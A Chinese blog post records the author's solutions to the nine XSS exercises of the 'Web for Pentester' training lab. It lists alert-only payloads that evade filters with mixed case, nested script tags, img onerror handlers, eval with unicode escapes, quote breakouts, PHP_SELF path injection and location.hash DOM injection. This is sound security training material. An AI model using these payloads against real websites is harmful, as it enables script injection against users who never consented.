web for pentester XSS部分练习

怼烎@ 2022-06-15 00:38 180阅读 0赞

example 1

url上改成name=<script>alert(1)</script>即可

example 2

把script中随便哪个字母改成大写即可

example 3

http://192.168.1.102/xss/example3.php?name=<Sc<script>ript>alert(1)<%2fSc</script>ript>

他会把<script>和</script>过滤掉，所以从当中插入，另外"/"需要转成 %2f 编码一下

example 4

一开始看不出来，只要有script都报error，于是用了name=<img%20src="image.gif"%20οnerrοr="alert(1)"%20/>避开了script。。后来一看文档的答案，还真是这个思路。。

example 5

发现输入其他的好像没问题，但是出现alert（1）就报错了，记得有其他的弹窗类型，比如confirm，试了一下果然可以： name=<img%20src="asd"%20οnerrοr=confirm("1")%20/>

根据答案文档的说法，还可以用eval，试了下，先把alert转换到ASCII，即\\u0061\\u006c\\u0065\\u0072\\u0074，所以答案是name=<script>eval(\\u0061\\u006c\\u0065\\u0072\\u0074(1))</script>，不过String.fromCharCode()暂时没试出来。

example 6

随便输入一些字母，发现被放在了<script> var $a="输入的字母"; </script> 中间。这就很简单了，把两边的双引号结束掉当中再插个alert就可以了：

name=";alert(1);%20var%20$b="

example 7

就把上一题的双引号改成单引号就可以了。。

example 8

这题把注意力都放在输入框里了，但是发现不管输入什么都会被编码，试了很久这条路不通。

看了提示才发现其实入口不在输入框而在URL上：<form action="/xss/example8.php" method="POST">

所以改成 http://192.168.1.102/xss/example8.php/"><script>alert(1)</script><form%20action=" 就对了

example 9

这题做的时候有点混乱。。先贴答案，把URL改成http://192.168.1.102/xss/example9.php\#<script>alert(1)</script>

首先看到代码里有<script> document.write(location.hash.substring(1)); </script>，所以显然入口在这里。

百度了一发，location.hash就是得到URL中”\#“开始的字符串。substring(1)就得到了\#后的字符串。

document.write()是把括号中的部分写到HTML文档的这段代码后（我大概这么理解了一下）

所以就在\#后加入payload：\#<script>alert(1)</script>

按F12看到HTML改成了：

PS：奇怪的是之前写简单的HTML，用chrome测试document.write()的时候，它会自动在文档中加入双引号，即使再用双引号注释掉也做不到弹窗。以后再试试看吧。

总体来说，web for pentester这9题算是很不错的XSS入门练习了，做完9题，会有一个简单直观的了解。

发表评论取消回复

表情：

评论列表（有 0 条评论，180人围观）

还没有评论，来说两句吧...

相关阅读

相关 Web Application Pentesting Tools

Web Application Pentesting Tools Organization [OWASP][] – The Open Web Applicat

川长思鸟来/ 2023年10月05日 09:17/ 0 赞/ 60 阅读

相关指针部分练习Ⅱ

1. 子函数Fun的功能是比较形参变量x和y所指的内存单元中的数据大小，将两者中的最小值返回。以下程序执行后输出结果是7,8,7。按要求在空白处填写适当的表达式或语句，使程序完

た入场券/ 2023年01月22日 04:54/ 0 赞/ 49 阅读

相关指针部分练习

1. 以下程序运行后的输出结果是 include <stdio.h> int main() { int a[10]={1,2,3,4,

忘是亡心i/ 2023年01月21日 14:22/ 0 赞/ 111 阅读

相关 web安全——XSS攻击

1. XSS XSS, 即为（Cross Site Scripting）, 中文名为跨站脚本（不使用CSS缩写是为了与层叠样式表区分）。是发生在目标用户的浏览器层

你的名字/ 2022年12月17日 07:02/ 0 赞/ 229 阅读

相关 web漏洞-XSS

XSS 漏洞介绍 XSS 攻击是指在网页中嵌入一段恶意的客户端 Js 脚本代码片段，JS 脚本恶意代码可以获取用户的 Cookie、URL 跳转、内容篡改、会话劫持

偏执的太偏执、/ 2022年10月17日 00:58/ 0 赞/ 45 阅读

相关 xss平台详解及练习

文章目录 xss平台使用教程练习 CTFhub web 反射型xss [XSS平台][XSS] xss平台使用教程 [xss平台

短命女/ 2022年09月05日 11:28/ 0 赞/ 198 阅读

相关 web for pentester XSS部分练习

example 1 url上改成name=<script>alert(1)</script>即可 example 2 把script中随便哪个字母改成大写即可

怼烎@/ 2022年06月15日 00:38/ 0 赞/ 181 阅读

相关 XSS web安全浅析

![这里写图片描述][SouthEast] ![这里写图片描述][SouthEast 1] xss 防范：（前端开发与服务端开发，HTTP，Cookie， Ajax

迈不过友情╰/ 2022年06月13日 12:25/ 0 赞/ 246 阅读

相关 Hack The Box Web Pentest 2019

\[20 Points\] Emdee five for life \[by L4mpje\] 问题描述： Can you encrypt fast enough?

Love The Way You Lie/ 2021年10月30日 06:10/ 0 赞/ 174 阅读

相关 Web渗透——XSS基础

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

柔光的暖阳◎/ 2021年07月25日 18:18/ 0 赞/ 383 阅读